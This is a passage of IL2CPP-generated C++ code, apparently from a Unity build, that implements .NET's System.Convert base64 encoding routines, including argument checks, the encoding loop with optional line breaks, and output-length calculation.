ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_3 = ___inArray0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); String_t* L_4 = Convert_ToBase64String_m86FF376EC650C7A6E85EDD7BCF5BEC23EE5402DF(L_2, 0, (((int32_t)((int32_t)(((RuntimeArray *)L_3)->max_length)))), 0, /*hidden argument*/NULL); return L_4; } } // System.String System.Convert::ToBase64String(System.Byte[],System.Int32,System.Int32,System.Base64FormattingOptions) extern "C" IL2CPP_METHOD_ATTR String_t* Convert_ToBase64String_m86FF376EC650C7A6E85EDD7BCF5BEC23EE5402DF (ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* ___inArray0, int32_t ___offset1, int32_t ___length2, int32_t ___options3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToBase64String_m86FF376EC650C7A6E85EDD7BCF5BEC23EE5402DF_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; bool V_1 = false; Il2CppChar* V_2 = NULL; String_t* V_3 = NULL; uint8_t* V_4 = NULL; ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* V_5 = NULL; String_t* G_B15_0 = NULL; String_t* G_B14_0 = NULL; String_t* G_B17_0 = NULL; String_t* G_B16_0 = NULL; String_t* G_B18_0 = NULL; String_t* G_B19_0 = NULL; { ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_0 = ___inArray0; if (L_0) { goto IL_000e; } } { ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD * L_1 = (ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD *)il2cpp_codegen_object_new(ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_il2cpp_TypeInfo_var); ArgumentNullException__ctor_mEE0C0D6FCB2D08CD7967DBB1329A0854BBED49ED(L_1, _stringLiteralB3337829708B47BA30EF6CB0D62B0BC7364C36F9, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, Convert_ToBase64String_m86FF376EC650C7A6E85EDD7BCF5BEC23EE5402DF_RuntimeMethod_var); } IL_000e: { int32_t L_2 = ___length2; if ((((int32_t)L_2) >= ((int32_t)0))) { goto IL_0027; } } { String_t* L_3 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral9071A4CB8E2F99F81D5B117DAE3211B994971FFA, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_4 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_4, _stringLiteral3D54973F528B01019A58A52D34D518405A01B891, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, Convert_ToBase64String_m86FF376EC650C7A6E85EDD7BCF5BEC23EE5402DF_RuntimeMethod_var); } IL_0027: { int32_t L_5 = ___offset1; if ((((int32_t)L_5) >= ((int32_t)0))) { goto IL_0040; } } { String_t* L_6 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral044F779DD78DC457C66C3F03FB54E04EE4013F70, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_7 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_7, _stringLiteral53A610E925BBC0A175E365D31241AE75AEEAD651, L_6, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_7, NULL, Convert_ToBase64String_m86FF376EC650C7A6E85EDD7BCF5BEC23EE5402DF_RuntimeMethod_var); } IL_0040: { int32_t L_8 = ___options3; if ((((int32_t)L_8) < ((int32_t)0))) { goto IL_0048; } } { int32_t L_9 = ___options3; if ((((int32_t)L_9) <= ((int32_t)1))) { goto IL_0067; } } IL_0048: { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_10 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)1); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_11 = L_10; int32_t L_12 = ___options3; int32_t L_13 = ((int32_t)L_12); RuntimeObject * L_14 = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &L_13); ArrayElementTypeCheck (L_11, L_14); (L_11)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)L_14); String_t* L_15 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralA581992EF2214628320EFA402E984AF6E5EA8654, L_11, /*hidden argument*/NULL); ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 * L_16 = (ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 *)il2cpp_codegen_object_new(ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1_il2cpp_TypeInfo_var); ArgumentException__ctor_m9A85EF7FEFEC21DDD525A67E831D77278E5165B7(L_16, L_15, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_16, NULL, Convert_ToBase64String_m86FF376EC650C7A6E85EDD7BCF5BEC23EE5402DF_RuntimeMethod_var); } IL_0067: { ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_17 = ___inArray0; V_0 = (((int32_t)((int32_t)(((RuntimeArray *)L_17)->max_length)))); int32_t L_18 = ___offset1; int32_t L_19 = V_0; int32_t L_20 = ___length2; if ((((int32_t)L_18) <= ((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_19, (int32_t)L_20))))) { goto IL_0086; } } { String_t* L_21 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral98CFE5E917B6BC87FA117F28F39F6E8B09499151, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_22 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_22, _stringLiteral53A610E925BBC0A175E365D31241AE75AEEAD651, L_21, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_22, NULL, Convert_ToBase64String_m86FF376EC650C7A6E85EDD7BCF5BEC23EE5402DF_RuntimeMethod_var); } IL_0086: { int32_t L_23 = V_0; if (L_23) { goto IL_008f; } } { String_t* L_24 = ((String_t_StaticFields*)il2cpp_codegen_static_fields_for(String_t_il2cpp_TypeInfo_var))->get_Empty_5(); return L_24; } IL_008f: { int32_t L_25 = ___options3; V_1 = (bool)((((int32_t)L_25) == ((int32_t)1))? 1 : 0); int32_t L_26 = ___length2; bool L_27 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); int32_t L_28 = Convert_ToBase64_CalculateAndValidateOutputLength_m1FAAD592F5E302E59EAB90CB292DD02505C2A0E6(L_26, L_27, /*hidden argument*/NULL); String_t* L_29 = String_FastAllocateString_m41FF9F02E99463841990C6971132D4D9E320914C(L_28, /*hidden argument*/NULL); String_t* L_30 = L_29; V_3 = L_30; String_t* L_31 = V_3; V_2 = (Il2CppChar*)(((uintptr_t)L_31)); Il2CppChar* L_32 = V_2; G_B14_0 = L_30; if (!L_32) { G_B15_0 = L_30; goto IL_00b0; } } { Il2CppChar* L_33 = V_2; int32_t L_34 = RuntimeHelpers_get_OffsetToStringData_mF3B79A906181F1A2734590DA161E2AF183853F8B(/*hidden argument*/NULL); V_2 = (Il2CppChar*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_33, (int32_t)L_34)); G_B15_0 = G_B14_0; } IL_00b0: { ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_35 = ___inArray0; ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_36 = L_35; V_5 = L_36; G_B16_0 = G_B15_0; if (!L_36) { G_B17_0 = G_B15_0; goto IL_00bc; } } { ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_37 = V_5; G_B17_0 = G_B16_0; if ((((int32_t)((int32_t)(((RuntimeArray *)L_37)->max_length))))) { G_B18_0 = G_B16_0; goto IL_00c2; } } IL_00bc: { V_4 = (uint8_t*)(((uintptr_t)0)); G_B19_0 = G_B17_0; goto IL_00cd; } IL_00c2: { ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_38 = V_5; V_4 = (uint8_t*)(((uintptr_t)((L_38)->GetAddressAtUnchecked(static_cast<il2cpp_array_size_t>(0))))); G_B19_0 = G_B18_0; } IL_00cd: { Il2CppChar* L_39 = V_2; uint8_t* L_40 = V_4; int32_t L_41 = ___offset1; int32_t L_42 = ___length2; bool L_43 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); Convert_ConvertToBase64Array_m2C6DC2EA273DB7F37A3A25116F18AF6DB5192E3B((Il2CppChar*)(Il2CppChar*)L_39, (uint8_t*)(uint8_t*)L_40, L_41, L_42, L_43, /*hidden argument*/NULL); return G_B19_0; } } // System.Int32 System.Convert::ConvertToBase64Array(System.Char*,System.Byte*,System.Int32,System.Int32,System.Boolean) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ConvertToBase64Array_m2C6DC2EA273DB7F37A3A25116F18AF6DB5192E3B (Il2CppChar* ___outChars0, uint8_t* ___inData1, int32_t ___offset2, int32_t ___length3, bool ___insertLineBreaks4, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ConvertToBase64Array_m2C6DC2EA273DB7F37A3A25116F18AF6DB5192E3B_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; int32_t V_3 = 0; int32_t V_4 = 0; Il2CppChar* V_5 = NULL; CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* V_6 = NULL; { int32_t L_0 = ___length3; V_0 = ((int32_t)((int32_t)L_0%(int32_t)3)); int32_t L_1 = ___offset2; int32_t L_2 = ___length3; int32_t L_3 = V_0; V_1 = ((int32_t)il2cpp_codegen_add((int32_t)L_1, (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_2, (int32_t)L_3)))); V_2 = 0; V_3 = 0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* L_4 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_base64Table_2(); CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* L_5 = L_4; V_6 = L_5; if (!L_5) { goto IL_001e; } } { CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* L_6 = V_6; if ((((int32_t)((int32_t)(((RuntimeArray *)L_6)->max_length))))) { goto IL_0024; } } IL_001e: { V_5 = (Il2CppChar*)(((uintptr_t)0)); goto IL_002f; } IL_0024: { CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* L_7 = V_6; V_5 = (Il2CppChar*)(((uintptr_t)((L_7)->GetAddressAtUnchecked(static_cast<il2cpp_array_size_t>(0))))); } IL_002f: { int32_t L_8 = ___offset2; V_4 = L_8; goto IL_00f4; } IL_0037: { bool L_9 = ___insertLineBreaks4; if (!L_9) { goto IL_0060; } } { int32_t L_10 = V_3; if ((!(((uint32_t)L_10) == ((uint32_t)((int32_t)76))))) { goto IL_005c; } } { Il2CppChar* L_11 = ___outChars0; int32_t L_12 = V_2; int32_t L_13 = L_12; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_13, (int32_t)1)); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_11, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)L_13)), (int32_t)2))))) = (int16_t)((int32_t)13); Il2CppChar* L_14 = ___outChars0; int32_t L_15 = V_2; int32_t L_16 = L_15; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_16, (int32_t)1)); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_14, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)L_16)), (int32_t)2))))) = (int16_t)((int32_t)10); V_3 = 0; } IL_005c: { int32_t L_17 = V_3; V_3 = ((int32_t)il2cpp_codegen_add((int32_t)L_17, (int32_t)4)); } IL_0060: { Il2CppChar* L_18 = ___outChars0; int32_t L_19 = V_2; Il2CppChar* L_20 = V_5; uint8_t* L_21 = ___inData1; int32_t L_22 = V_4; int32_t L_23 = *((uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_21, (int32_t)L_22))); int32_t L_24 = *((uint16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_20, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)((int32_t)((int32_t)((int32_t)L_23&(int32_t)((int32_t)252)))>>(int32_t)2)))), (int32_t)2))))); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_18, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)L_19)), (int32_t)2))))) = (int16_t)L_24; Il2CppChar* L_25 = ___outChars0; int32_t L_26 = V_2; Il2CppChar* L_27 = V_5; uint8_t* L_28 = ___inData1; int32_t L_29 = V_4; int32_t L_30 = *((uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_28, (int32_t)L_29))); uint8_t* L_31 = ___inData1; int32_t L_32 = V_4; int32_t L_33 = *((uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_31, (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_32, (int32_t)1))))); int32_t L_34 = *((uint16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_27, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)((int32_t)((int32_t)((int32_t)((int32_t)((int32_t)L_30&(int32_t)3))<<(int32_t)4))|(int32_t)((int32_t)((int32_t)((int32_t)((int32_t)L_33&(int32_t)((int32_t)240)))>>(int32_t)4)))))), (int32_t)2))))); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_25, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)il2cpp_codegen_add((int32_t)L_26, (int32_t)1)))), (int32_t)2))))) = (int16_t)L_34; Il2CppChar* L_35 = ___outChars0; int32_t L_36 = V_2; Il2CppChar* L_37 = V_5; uint8_t* L_38 = ___inData1; int32_t L_39 = V_4; int32_t L_40 = *((uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_38, (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_39, (int32_t)1))))); uint8_t* L_41 = ___inData1; int32_t L_42 = V_4; int32_t L_43 = *((uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_41, (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_42, (int32_t)2))))); int32_t L_44 = *((uint16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_37, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)((int32_t)((int32_t)((int32_t)((int32_t)((int32_t)L_40&(int32_t)((int32_t)15)))<<(int32_t)2))|(int32_t)((int32_t)((int32_t)((int32_t)((int32_t)L_43&(int32_t)((int32_t)192)))>>(int32_t)6)))))), (int32_t)2))))); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_35, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)il2cpp_codegen_add((int32_t)L_36, (int32_t)2)))), (int32_t)2))))) = (int16_t)L_44; Il2CppChar* L_45 = ___outChars0; int32_t L_46 = V_2; Il2CppChar* L_47 = V_5; uint8_t* L_48 = ___inData1; int32_t L_49 = V_4; int32_t L_50 = *((uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_48, (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_49, (int32_t)2))))); int32_t L_51 = *((uint16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_47, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)((int32_t)L_50&(int32_t)((int32_t)63))))), (int32_t)2))))); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_45, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)il2cpp_codegen_add((int32_t)L_46, (int32_t)3)))), (int32_t)2))))) = (int16_t)L_51; int32_t L_52 = V_2; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_52, (int32_t)4)); int32_t L_53 = V_4; V_4 = ((int32_t)il2cpp_codegen_add((int32_t)L_53, (int32_t)3)); } IL_00f4: { int32_t L_54 = V_4; int32_t L_55 = V_1; if ((((int32_t)L_54) < ((int32_t)L_55))) { goto IL_0037; } } { int32_t L_56 = V_1; V_4 = L_56; bool L_57 = ___insertLineBreaks4; if (!L_57) { goto IL_0125; } } { int32_t L_58 = V_0; if (!L_58) { goto IL_0125; } } { int32_t L_59 = V_3; if ((!(((uint32_t)L_59) == ((uint32_t)((int32_t)76))))) { goto IL_0125; } } { Il2CppChar* L_60 = ___outChars0; int32_t L_61 = V_2; int32_t L_62 = L_61; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_62, (int32_t)1)); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_60, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)L_62)), (int32_t)2))))) = (int16_t)((int32_t)13); Il2CppChar* L_63 = ___outChars0; int32_t L_64 = V_2; int32_t L_65 = L_64; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_65, (int32_t)1)); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_63, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)L_65)), (int32_t)2))))) = (int16_t)((int32_t)10); } IL_0125: { int32_t L_66 = V_0; if ((((int32_t)L_66) == ((int32_t)1))) { goto IL_01a8; } } { int32_t L_67 = V_0; if ((!(((uint32_t)L_67) == ((uint32_t)2)))) { goto IL_0204; } } { Il2CppChar* L_68 = ___outChars0; int32_t L_69 = V_2; Il2CppChar* L_70 = V_5; uint8_t* L_71 = ___inData1; int32_t L_72 = V_4; int32_t L_73 = *((uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_71, (int32_t)L_72))); int32_t L_74 = *((uint16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_70, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)((int32_t)((int32_t)((int32_t)L_73&(int32_t)((int32_t)252)))>>(int32_t)2)))), (int32_t)2))))); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_68, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)L_69)), (int32_t)2))))) = (int16_t)L_74; Il2CppChar* L_75 = ___outChars0; int32_t L_76 = V_2; Il2CppChar* L_77 = V_5; uint8_t* L_78 = ___inData1; int32_t L_79 = V_4; int32_t L_80 = *((uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_78, (int32_t)L_79))); uint8_t* L_81 = ___inData1; int32_t L_82 = V_4; int32_t L_83 = *((uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_81, (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_82, (int32_t)1))))); int32_t L_84 = *((uint16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_77, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)((int32_t)((int32_t)((int32_t)((int32_t)((int32_t)L_80&(int32_t)3))<<(int32_t)4))|(int32_t)((int32_t)((int32_t)((int32_t)((int32_t)L_83&(int32_t)((int32_t)240)))>>(int32_t)4)))))), (int32_t)2))))); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_75, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)il2cpp_codegen_add((int32_t)L_76, (int32_t)1)))), (int32_t)2))))) = (int16_t)L_84; Il2CppChar* L_85 = ___outChars0; int32_t L_86 = V_2; Il2CppChar* L_87 = V_5; uint8_t* L_88 = ___inData1; int32_t L_89 = V_4; int32_t L_90 = *((uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_88, (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_89, (int32_t)1))))); int32_t L_91 = *((uint16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_87, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)((int32_t)((int32_t)((int32_t)L_90&(int32_t)((int32_t)15)))<<(int32_t)2)))), (int32_t)2))))); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_85, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)il2cpp_codegen_add((int32_t)L_86, (int32_t)2)))), (int32_t)2))))) = (int16_t)L_91; Il2CppChar* L_92 = ___outChars0; int32_t L_93 = V_2; Il2CppChar* L_94 = V_5; int32_t L_95 = *((uint16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_94, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)64))), (int32_t)2))))); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_92, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)il2cpp_codegen_add((int32_t)L_93, (int32_t)3)))), (int32_t)2))))) = (int16_t)L_95; int32_t L_96 = V_2; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_96, (int32_t)4)); goto IL_0204; } IL_01a8: { Il2CppChar* L_97 = ___outChars0; int32_t L_98 = V_2; Il2CppChar* L_99 = V_5; uint8_t* L_100 = ___inData1; int32_t L_101 = V_4; int32_t L_102 = *((uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_100, (int32_t)L_101))); int32_t L_103 = *((uint16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_99, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)((int32_t)((int32_t)((int32_t)L_102&(int32_t)((int32_t)252)))>>(int32_t)2)))), (int32_t)2))))); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_97, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)L_98)), (int32_t)2))))) = (int16_t)L_103; Il2CppChar* L_104 = ___outChars0; int32_t L_105 = V_2; Il2CppChar* L_106 = V_5; uint8_t* L_107 = ___inData1; int32_t L_108 = V_4; int32_t L_109 = *((uint8_t*)((uint8_t*)il2cpp_codegen_add((intptr_t)L_107, (int32_t)L_108))); int32_t L_110 = *((uint16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_106, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)((int32_t)((int32_t)((int32_t)L_109&(int32_t)3))<<(int32_t)4)))), (int32_t)2))))); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_104, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)il2cpp_codegen_add((int32_t)L_105, (int32_t)1)))), (int32_t)2))))) = (int16_t)L_110; Il2CppChar* L_111 = ___outChars0; int32_t L_112 = V_2; Il2CppChar* L_113 = V_5; int32_t L_114 = *((uint16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_113, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)64))), (int32_t)2))))); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_111, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)il2cpp_codegen_add((int32_t)L_112, (int32_t)2)))), (int32_t)2))))) = (int16_t)L_114; Il2CppChar* L_115 = ___outChars0; int32_t L_116 = V_2; Il2CppChar* L_117 = V_5; int32_t L_118 = *((uint16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_117, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)64))), (int32_t)2))))); *((int16_t*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_115, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)il2cpp_codegen_add((int32_t)L_116, (int32_t)3)))), (int32_t)2))))) = (int16_t)L_118; int32_t L_119 = V_2; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_119, (int32_t)4)); } IL_0204: { V_6 = (CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2*)NULL; int32_t L_120 = V_2; return L_120; } } // System.Int32 System.Convert::ToBase64_CalculateAndValidateOutputLength(System.Int32,System.Boolean) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToBase64_CalculateAndValidateOutputLength_m1FAAD592F5E302E59EAB90CB292DD02505C2A0E6 (int32_t ___inputLength0, bool ___insertLineBreaks1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToBase64_CalculateAndValidateOutputLength_m1FAAD592F5E302E59EAB90CB292DD02505C2A0E6_MetadataUsageId); s_Il2CppMethodInitialized = true; } int64_t V_0 = 0; int64_t V_1 = 0; int64_t G_B2_0 = 0; int64_t G_B1_0 = 0; int32_t G_B3_0 = 0; int64_t G_B3_1 = 0; { int32_t L_0 = ___inputLength0; V_0 = ((int64_t)il2cpp_codegen_multiply((int64_t)((int64_t)((int64_t)(((int64_t)((int64_t)L_0)))/(int64_t)(((int64_t)((int64_t)3))))), (int64_t)(((int64_t)((int64_t)4))))); int64_t L_1 = V_0; int32_t L_2 = ___inputLength0; G_B1_0 = L_1; if (((int32_t)((int32_t)L_2%(int32_t)3))) { G_B2_0 = L_1; goto IL_0012; } } { G_B3_0 = 0; G_B3_1 = G_B1_0; goto IL_0013; } IL_0012: { G_B3_0 = 4; G_B3_1 = G_B2_0; } IL_0013: { V_0 = ((int64_t)il2cpp_codegen_add((int64_t)G_B3_1, (int64_t)(((int64_t)((int64_t)G_B3_0))))); int64_t L_3 = V_0; if (L_3) { goto IL_001b; } } { return 0; } IL_001b: { bool L_4 = ___insertLineBreaks1; if (!L_4) { goto IL_0037; } } { int64_t L_5 = V_0; V_1 = ((int64_t)((int64_t)L_5/(int64_t)(((int64_t)((int64_t)((int32_t)76)))))); int64_t L_6 = V_0; if (((int64_t)((int64_t)L_6%(int64_t)(((int64_t)((int64_t)((int32_t)76))))))) { goto IL_0030; } } { int64_t L_7 = V_1; V_1 = ((int64_t)il2cpp_codegen_subtract((int64_t)L_7, (int64_t)(((int64_t)((int64_t)1))))); } IL_0030: { int64_t L_8 = V_0; int64_t L_9 = V_1; V_0 = ((int64_t)il2cpp_codegen_add((int64_t)L_8, (int64_t)((int64_t)il2cpp_codegen_multiply((int64_t)L_9, (int64_t)(((int64_t)((int64_t)2))))))); } IL_0037: { int64_t L_10 = V_0; if ((((int64_t)L_10) <= ((int64_t)(((int64_t)((int64_t)((int32_t)2147483647LL))))))) { goto IL_0046; } } { OutOfMemoryException_t2DF3EAC178583BD1DEFAAECBEDB2AF1EA86FBFC7 * L_11 = (OutOfMemoryException_t2DF3EAC178583BD1DEFAAECBEDB2AF1EA86FBFC7 *)il2cpp_codegen_object_new(OutOfMemoryException_t2DF3EAC178583BD1DEFAAECBEDB2AF1EA86FBFC7_il2cpp_TypeInfo_var); 